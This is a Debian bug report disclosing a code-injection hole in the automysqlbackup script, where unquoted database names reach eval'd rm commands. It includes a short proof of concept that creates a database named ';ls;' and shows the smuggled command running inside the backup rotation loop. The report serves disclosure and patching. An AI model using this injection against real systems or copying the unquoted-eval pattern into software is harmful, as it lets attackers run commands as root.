Bug#706099: automysqlbackup: Code injection via unsafe database names inside eval

Axel Beckert Wed, 24 Apr 2013 09:27:20 -0700

Package: automysqlbackup
Version: 2.5-6
Severity: grave
Tags: security patch


This is related to http://bugs.debian.org/706095 as
autopostgresqlbackup is a fork of automysqlbackup.

In automysqlbackup, database names are used unmangled and unquoted
inside several evals:

# dgrep eval automysqlbackup 
/usr/sbin/automysqlbackup:#    used "eval" for "rm" commands to try and resolve 
rotation issues.
/usr/sbin/automysqlbackup:eval rm -f "$BACKUPDIR/latest/*"
/usr/sbin/automysqlbackup:      eval $PREBACKUP
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*" 
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/daily/$DB/*.$DOW.sql.*" 
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/weekly/week.$REMW.*" 
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/daily/*.$DOW.sql.*" 
/usr/sbin/automysqlbackup:      eval $POSTBACKUP
/usr/sbin/automysqlbackup:eval rm -f "$LOGFILE"
/usr/sbin/automysqlbackup:eval rm -f "$LOGERR"
#

Proof of concept exploit by using code copy and pasted from the script
on the commandline. Depending on the configuration, users may be able
to create databases without root access:

# mysqladmin create ';ls;'
# DBNAMES="`mysql --defaults-file=/etc/mysql/debian.cnf --batch 
--skip-column-names -e "show databases"| sed 's/ /%/g'`"
# echo $DBNAMES 
information_schema ;ls; bangstat mysql performance_schema phpmyadmin test
# for DB in $DBNAMES; do eval echo rm -fv 
"$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*"; done
rm -fv /weekly/information_schema/information_schema_week..*
rm -fv /weekly/
acpid           automysqlbackup       console-setup  devpts        grub     
hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     
hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  
keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: /: Is a directory
acpid           automysqlbackup       console-setup  devpts        grub     
hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     
hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  
keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: _week..*: command not found
rm -fv /weekly/bangstat/bangstat_week..*
rm -fv /weekly/mysql/mysql_week..*
rm -fv /weekly/performance_schema/performance_schema_week..*
rm -fv /weekly/phpmyadmin/phpmyadmin_week..*
rm -fv /weekly/test/test_week..*
#

The patch is the same as in http://bugs.debian.org/706095 except for
maybe line numbers and possibly some context lines, but there's no
(relevant) difference in the relevant lines:

# diff -Bb  <(fgrep eval /usr/sbin/autopostgresqlbackup) <(fgrep eval 
/usr/sbin/automysqlbackup)
0a1
> #    used "eval" for "rm" commands to try and resolve rotation issues.

                Regards, Axel
-- 
 ,''`.  |  Axel Beckert <a...@debian.org>, http://people.debian.org/~abe/
: :' :  |  Debian Developer, ftp.ch.debian.org Admin
`. `'   |  1024D: F067 EA27 26B9 C3FC 1486  202E C09E 1D89 9593 0EDE
  `-    |  4096R: 2517 B724 C5F6 CA99 5329  6E61 2FF9 CD59 6126 16B5


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#706099: automysqlbackup: Code injection via unsafe database names inside eval

Reply via email to